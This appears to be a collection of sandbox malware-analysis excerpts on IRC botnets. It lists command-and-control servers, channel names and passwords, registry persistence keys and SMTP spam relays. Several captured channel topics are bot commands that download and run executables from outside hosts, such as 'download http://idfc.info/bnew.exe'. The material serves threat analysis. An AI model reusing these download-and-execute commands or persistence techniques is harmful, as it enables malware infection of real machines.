Author: Pig

Remote Host Port Number72.184.196.76 6667 NICK XP|00|USA|SP2|4653USER jddgw 0 0 :XP|00|USA|SP2|4653USERHOST XP|00|USA|SP2|4653MODE XP|00|USA|SP2|4653 +x+iBJOIN #eckoPRIVMSG #ecko :12Password accepted12Type commandlist12[PSTORE]: Starting Pstore.12[PSTORE]: Pstore Started.PONG :1F6819DC Other details * The following ports were open in the system: Port Protocol Process113 TCP msconfig.exe (%System%msconfig.exe)1052 TCP msconfig.exe (%System%msconfig.exe) Registry Modifications * The following Registry Keys were created: o [pathnameRead more...

Host Name IP Addressdell-d3e62f7e26 10.1.2.2xdetras.dyndns.info 109.123.66.112 * C&C Server: 109.123.66.112:6667 * Server Password: * Username: XP-5750 * Nickname: [DEU|00|P|03462] * Channel: #nuevos# (Password: mariano) * Channeltopic: : Registry Changes by all processesCreate or Open Changes HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun “winlogin” = winlogin.exeHKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionTerminal ServerInstallSoftwareMicrosoftWindowsCurrentVersionRun “winlogin” = winlogin.exeHKEY_LOCAL_MACHINESYSTEMControlSet001ServicesSharedAccessParametersFirewallPolicyStandardProfileAuthorizedApplicationsList “c:1.exe” = c:1.exe:*:Enabled:winloginHKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionTracingMicrosofteappcfg “LogSessionName” = [REG_EXPAND_SZ, value: stdout]HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionTracingMicrosofteappcfg “Active”Read more...

bnetnew.helohmar.com 98.126.18.10Outgoing connection to remote server: bnetnew.helohmar.com TCP port 8800SMTP: 65.55.37.88:25 * SMTP: 74.6.136.65:25 * Username / Password: / SMTP: 65.55.92.152:25SMTP: 65.55.37.104:25SMTP: 65.54.188.72:25SMTP: 65.55.92.152:25SMTP: 65.54.188.110:25 * SMTP: 209.191.88.254:25 * Username / Password: / Registry Changes by all processesCreate or Open Changes HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon “Taskman” = C:RECYCLERS-1-5-21-0243556031-888888379-781863308-1455mmdg.exeHKEY_CURRENT_USERSoftwareMicrosoftWindows NTCurrentVersionWinlogon “Shell” = explorer.exe,C:RECYCLERS-1-5-21-0243556031-888888379-781863308-1455mmdg.exeHKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun “Tjmm71” = C:RECYCLERS-1-5-21-0243556031-888888379-781863308-1455mmdg.exeReads HKEY_CURRENT_USERSoftwareMicrosoftWindows NTCurrentVersionWinlogonRead more...

67.43.232.36:8080Nick: FpNYgjKTVUsername: ngyccnJoined Channel: #rstn2Channel Topic for Channel #rstn2: “* ipscan s.s.s dcom2 -f -s” other chanels Now talking in ##xddcTopic On: [ ##xddc ] [=t0Y0F21DYX4e6UWiqOP9ZY0vX4MOFnQpiS67nAcB1uLbI7sg33T9PIBDhDk/qm5 ]Topic By: [ m1244 ]Modes On: [ ##xddc ] [ +smntSMCu ] Now talking in #xddc1Topic On: [ #xddc1 ] [13 * download http://idfc.info/bnew.exe -e -f -s ]Topic By:Read more...

72.10.169.26:2293Nick: akjHdYdPUsername: tpepiyJoined Channel: #siwaChannel Topic for Channel #siwa: “=XRlSYWHDxodKoKTdT7BxKpedXm7GERdOTvU41sULBVo0tVz3vs9al15JIViw”

Remote Host Port Number58.30.17.229 8080 NICK {NEW-USA-XP-SXYOQB}USER USA “” “lol” :USAJOIN #!RapePONG :ghostnet.ghostmarket.net Other details * The following port was open in the system: Port Protocol Process1052 TCP File.exe (%UserProfile%File.exe) Registry Modifications * The newly created Registry Value is: o [HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun] + Microsoft Drive Guard32 = “%UserProfile%File.exe” so that File.exe runs every time Windows startsRead more...

74.81.64.25 (2345)#info [21:41] [BRA|00|D|33418]: [IM]: Thread Activated: Sending Message With Email.

Host Name IP Addressdell-d3e62f7e26 10.1.12.2drego85.dyndns.org 67.220.65.39 * C&C Server: 67.220.65.39:6667 * Server Password: * Username: XP-2174 * Nickname: [00|DEU|707227] * Channel: #imbot (Password: config) * Channeltopic: :.dl http://ownedrox.altervista.org/imbotv4.exe c:startme32.exe 1

* Requested Host: net.anddos.co.uk* Resulting Address: 94.23.153.223 * IRC Data o User Name: zgtlat o Host Name: “” o Server Name: o Real Name: zgtlat o Password: dickybob o Nick Name: ncrrpk o Non RFC Conform: 1 + Channel # Name: #ohai3 # Password: trb123trb + Notice Message Deleted # Value: :irc.goonet.net NOTICE AUTH :***Read more...

DNS LookupHost Name IP Address0 127.0.0.1shitit.net shitit.net 75.126.252.200UDP ConnectionsRemote IP Address: 127.0.0.1 Port: 1045Send Datagram: 53 packet(s) of size 1Recv Datagram: 53 packet(s) of size 1Download URLshttp://75.126.252.200/fly3.jpg (shitit.net)Outgoing connection to remote server: shitit.net TCP port 80DNS LookupHost Name IP Addressdell-d3e62f7e26 10.1.10.2sip4.voipkosovasite.com 82.114.87.46 * C&C Server: 82.114.87.46:1868 * Server Password: * Username: XP-9971 * Nickname: [00|DEU|994663]Read more...